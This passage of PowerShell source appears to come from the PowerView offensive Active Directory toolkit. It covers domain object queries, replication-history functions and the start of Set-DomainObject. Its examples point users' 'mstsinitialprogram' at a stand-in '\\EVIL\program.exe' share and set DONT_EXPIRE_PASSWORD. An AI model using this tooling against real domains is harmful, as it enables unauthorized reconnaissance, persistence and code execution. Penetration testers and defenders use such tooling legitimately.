[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    DynamicParam {\n        $UACValueNames = [Enum]::GetNames($UACEnum)\n        # add in the negations\n        $UACValueNames = $UACValueNames | ForEach-Object {$_; \"NOT_$_\"}\n        # create new dynamic parameter\n        New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])\n    }\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n    }\n\n    PROCESS {\n        #bind dynamic parameter to a friendly variable\n        if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {\n            New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters\n        }\n        $IdentityFilter = ''\n        $Filter = ''\n        $Identity | Where-Object {$_} | ForEach-Object {\n            $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n            if ($IdentityInstance -match '^S-1-') {\n                $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n            }\n            elseif ($IdentityInstance -match '^(CN|OU|DC)=') {\n                $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                    # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                    #   and rebuild the domain searcher\n                    $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                    Write-Verbose \"[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                    $SearcherArguments['Domain'] = $IdentityDomain\n                    $ObjectSearcher = Get-DomainSearcher @SearcherArguments\n                    if (-not $ObjectSearcher) {\n                        Write-Warning \"[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                    }\n                }\n            }\n            elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                Write-Output \"$GuidByteString\"\n                $IdentityFilter += \"(objectguid=$GuidByteString)\"\n            }\n            elseif ($IdentityInstance.Contains('\\')) {\n                $ConvertedIdentityInstance = $IdentityInstance.Replace('\\28', '(').Replace('\\29', ')') | Convert-ADName -OutputType Canonical\n                if ($ConvertedIdentityInstance) {\n                    $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))\n                    $ObjectName = $IdentityInstance.Split('\\')[1]\n                    $IdentityFilter += \"(samAccountName=$ObjectName)\"\n                    $SearcherArguments['Domain'] = $ObjectDomain\n                    Write-Verbose \"[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'\"\n                    $ObjectSearcher = Get-DomainSearcher @SearcherArguments\n                }\n            }\n            elseif ($IdentityInstance.Contains('.')) {\n                $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))\"\n            }\n            else {\n                $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))\"\n            }\n        }\n        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n            $Filter += \"(|$IdentityFilter)\"\n        }\n        if ($PSBoundParameters['LDAPFilter']) {\n            Write-Verbose \"[Get-DomainObject] Using additional LDAP filter: $LDAPFilter\"\n            $Filter += \"$LDAPFilter\"\n        }\n\n        # build the LDAP filter for the dynamic UAC filter value\n        $UACFilter | Where-Object {$_} | ForEach-Object {\n            if ($_ -match 'NOT_.*') {\n                $UACField = $_.Substring(4)\n                $UACValue = [Int]($UACEnum::$UACField)\n                $Filter += \"(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))\"\n            }\n            else {\n                $UACValue = [Int]($UACEnum::$_)\n                $Filter += \"(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)\"\n            }\n        }\n\n        if ($Filter -and $Filter -ne '') {\n            $SearcherArguments['LDAPFilter'] = \"(&$Filter)\"\n        }\n        Write-Verbose \"[Get-DomainObject] Get-DomainObject filter string: $($Filter)\"\n            \n        $Results = Invoke-LDAPQuery @SearcherArguments\n        $Results | Where-Object {$_} | ForEach-Object {\n            if ($PSBoundParameters['Raw']) {\n                # return raw result objects\n                $Object = $_\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')\n            }\n            else {\n                if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                    $Prop = @{}\n                    foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                        if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate')) {\n                            $Prop[$a] = $_.Attributes[$a]\n                        }\n                        else {\n                            $Values = @()\n                            foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                            }\n                            $Prop[$a] = $Values\n                        }\n                    }\n                }\n                else {\n                    $Prop = $_.Properties\n                }\n\n                $Object = Convert-LDAPProperty -Properties $Prop\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')\n            }\n            $Object\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Get-DomainObject] Error disposing of the Results object: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainObjectAttributeHistory {\n<#\n.SYNOPSIS\n\nReturns the Active Directory attribute replication metadata for the specified\nobject, i.e. a parsed version of the msds-replattributemetadata attribute.\nBy default, replication data for every domain object is returned.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject\n\n.DESCRIPTION\n\nWraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'.\nThis is the domain attribute replication metadata associated with the object. The results are\nparsed from their XML string form and returned as a custom object.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nOnly return replication metadata on the specified property names.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainObjectAttributeHistory -Domain testlab.local\n\nReturn all attribute replication metadata for all objects in the testlab.local domain.\n\n.EXAMPLE\n\n'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft\n\nObjectDN      ObjectGuid    AttributeNam LastOriginat Version      LastOriginat\n                            e            ingChange                 ingDsaDN\n--------      ----------    ------------ ------------ -------      ------------\nCN=dfm.a,C... a6263874-f... objectClass  2017-03-0... 1            CN=NTDS S...\nCN=DA,CN=U... 77b56df4-f... objectClass  2017-04-1... 1            CN=NTDS S...\nCN=harmj0y... 94299db1-e... objectClass  2017-03-0... 1            CN=NTDS S...\n\n.EXAMPLE\n\nGet-DomainObjectAttributeHistory harmj0y -Properties userAccountControl\n\nObjectDN              : CN=harmj0y,CN=Users,DC=testlab,DC=local\nObjectGuid            : 94299db1-e3e7-48f9-845b-3bffef8bedbb\nAttributeName         : userAccountControl\nLastOriginatingChange : 2017-03-07T19:56:27Z\nVersion               : 4\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\n.OUTPUTS\n\nPowerView.ADObjectAttributeHistory\n\nCustom PSObject with translated replication metadata fields.\n\n.LINK\n\nhttps://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.ADObjectAttributeHistory')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties'    =   'msds-replattributemetadata','distinguishedname'\n            'Raw'           =   $True\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['Properties']) {\n            $PropertyFilter = $PSBoundParameters['Properties'] -Join '|'\n        }\n        else {\n            $PropertyFilter = ''\n        }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }\n\n        Get-DomainObject @SearcherArguments | ForEach-Object {\n            $ObjectDN = $_.Properties['distinguishedname'][0]\n            ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) {\n                $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue\n                if ($TempObject) {\n                    if ($TempObject.pszAttributeName -Match $PropertyFilter) {\n                        $Output = New-Object PSObject\n                        $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN\n                        $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName\n                        $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange\n                        $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion\n                        $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN\n                        $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory')\n                        $Output\n                    }\n                }\n                else {\n                    Write-Verbose \"[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainObjectLinkedAttributeHistory {\n<#\n.SYNOPSIS\n\nReturns the Active Directory links attribute value replication metadata for the\nspecified object, i.e. a parsed version of the msds-replvaluemetadata attribute.\nBy default, replication data for every domain object is returned.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject\n\n.DESCRIPTION\n\nWraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'.\nThis is the domain linked attribute value replication metadata associated with the object. The\nresults are parsed from their XML string form and returned as a custom object.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nOnly return replication metadata on the specified property names.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a\n\nCount Name\n----- ----\n    4 CN=Administrators,CN=Builtin,DC=testlab,DC=local\n    4 CN=Users,CN=Builtin,DC=testlab,DC=local\n    2 CN=Guests,CN=Builtin,DC=testlab,DC=local\n    1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local\n    1 CN=Schema Admins,CN=Users,DC=testlab,DC=local\n    1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local\n    4 CN=Domain Admins,CN=Users,DC=testlab,DC=local\n    1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local\n    1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local\n    1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local\n    8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local\n    2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,...\n    1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con...\n    1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local\n    3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local\n\n\n.EXAMPLE\n\n'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory\n\nObjectDN              : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local\nObjectGuid            : 94e782c1-16a1-400b-a7d0-1126038c6387\nAttributeName         : member\nAttributeValue        : CN=Administrator,CN=Users,DC=testlab,DC=local\nTimeDeleted           : 2017-03-06T00:48:29Z\nTimeCreated           : 2017-03-06T00:48:29Z\nLastOriginatingChange : 2017-03-06T00:48:29Z\nVersion               : 1\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\nObjectDN              : CN=Domain Admins,CN=Users,DC=testlab,DC=local\nObjectGuid            : af94f49e-61a5-4f7d-a17c-d80fb16a5220\nAttributeName         : member\nAttributeValue        : CN=dfm,CN=Users,DC=testlab,DC=local\nTimeDeleted           : 2017-06-13T22:20:02Z\nTimeCreated           : 2017-06-13T22:20:02Z\nLastOriginatingChange : 2017-06-13T22:20:22Z\nVersion               : 2\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\nObjectDN              : CN=Domain Admins,CN=Users,DC=testlab,DC=local\nObjectGuid            : af94f49e-61a5-4f7d-a17c-d80fb16a5220\nAttributeName         : member\nAttributeValue        : CN=Administrator,CN=Users,DC=testlab,DC=local\nTimeDeleted           : 2017-03-06T00:48:29Z\nTimeCreated           : 2017-03-06T00:48:29Z\nLastOriginatingChange : 2017-03-06T00:48:29Z\nVersion               : 1\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\n.EXAMPLE\n\nGet-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local\n\nObjectDN              : CN=ServerAdmins,CN=Users,DC=testlab,DC=local\nObjectGuid            : 603b46ad-555c-49b3-8745-c0718febefc2\nAttributeName         : member\nAttributeValue        : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local\nTimeDeleted           : 2017-04-10T22:17:19Z\nTimeCreated           : 2017-04-10T22:17:19Z\nLastOriginatingChange : 2017-04-10T22:17:19Z\nVersion               : 1\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\n.OUTPUTS\n\nPowerView.ADObjectLinkedAttributeHistory\n\nCustom PSObject with translated replication metadata fields.\n\n.LINK\n\nhttps://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.ADObjectLinkedAttributeHistory')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties'    =   'msds-replvaluemetadata','distinguishedname'\n            'Raw'           =   $True\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['Properties']) {\n            $PropertyFilter = $PSBoundParameters['Properties'] -Join '|'\n        }\n        else {\n            $PropertyFilter = ''\n        }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }\n\n        Get-DomainObject @SearcherArguments | ForEach-Object {\n            $ObjectDN = $_.Properties['distinguishedname'][0]\n            ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {\n                $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue\n                if ($TempObject) {\n                    if ($TempObject.pszAttributeName -Match $PropertyFilter) {\n                        $Output = New-Object PSObject\n                        $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN\n                        $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName\n                        $Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn\n                        $Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated\n                        $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted\n                        $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange\n                        $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion\n                        $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN\n                        $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory')\n                        $Output\n                    }\n                }\n                else {\n                    Write-Verbose \"[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Set-DomainObject {\n<#\n.SYNOPSIS\n\nModifies a gven property for a specified active directory object.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject  \n\n.DESCRIPTION\n\nSplats user/object targeting parameters to Get-DomainObject, returning the raw\nsearchresult object. Retrieves the raw directoryentry for the object, and sets\nany values from -Set @{}, XORs any values from -XOR @{}, and clears any values\nfrom -Clear @().\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Set\n\nSpecifies values for one or more object properties (in the form of a hashtable) that will replace the current values.\n\n.PARAMETER XOR\n\nSpecifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.\n\n.PARAMETER Clear\n\nSpecifies an array of object properties that will be cleared in the directory.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nSet-DomainObject testuser -Set @{'mstsinitialprogram'='\\\\EVIL\\program.exe'} -Verbose\n\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\nVERBOSE: Setting mstsinitialprogram to \\\\EVIL\\program.exe for object testuser\n\n.EXAMPLE\n\n\"S-1-5-21-890171859-3433809279-3366196753-1108\",\"testuser\" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\\\EVIL\\program2.exe'} -Verbose\n\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: Get-DomainObject filter string:\n(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))\nVERBOSE: Setting mstsinitialprogram to \\\\EVIL\\program2.exe for object harmj0y\nVERBOSE: Setting countrycode to 1234 for object harmj0y\nVERBOSE: Get-DomainSearcher search string:\nLDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\nVERBOSE: Setting mstsinitialprogram to \\\\EVIL\\program2.exe for object testuser\nVERBOSE: Setting countrycode to 1234 for object testuser\n\n.EXAMPLE\n\n\"S-1-5-21-890171859-3433809279-3366196753-1108\",\"testuser\" | Set-DomainObject -Clear department -Verbose\n\nCleares the 'department' field for both object identities.\n\n.EXAMPLE\n\nGet-DomainUser testuser | ConvertFrom-UACValue -Verbose\n\nName                           Value\n----                           -----\nNORMAL_ACCOUNT                 512\n\n\nSet-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose\n\nVERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))\nVERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'\n\nGet-DomainUser testuser | ConvertFrom-UACValue -Verbose\n\nName                           Value\n----                           -----\nNORMAL_ACCOUNT                 512\nDONT_EXPIRE_PASSWORD           65536\n\n.EXAMPLE\n\nGet-DomainUser -Identity testuser -Properties scriptpath\n\nscriptpath\n----------\n\\\\primary\\sysvol\\blah.ps1\n\n$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nSet-DomainObject -Identity testuser -Set 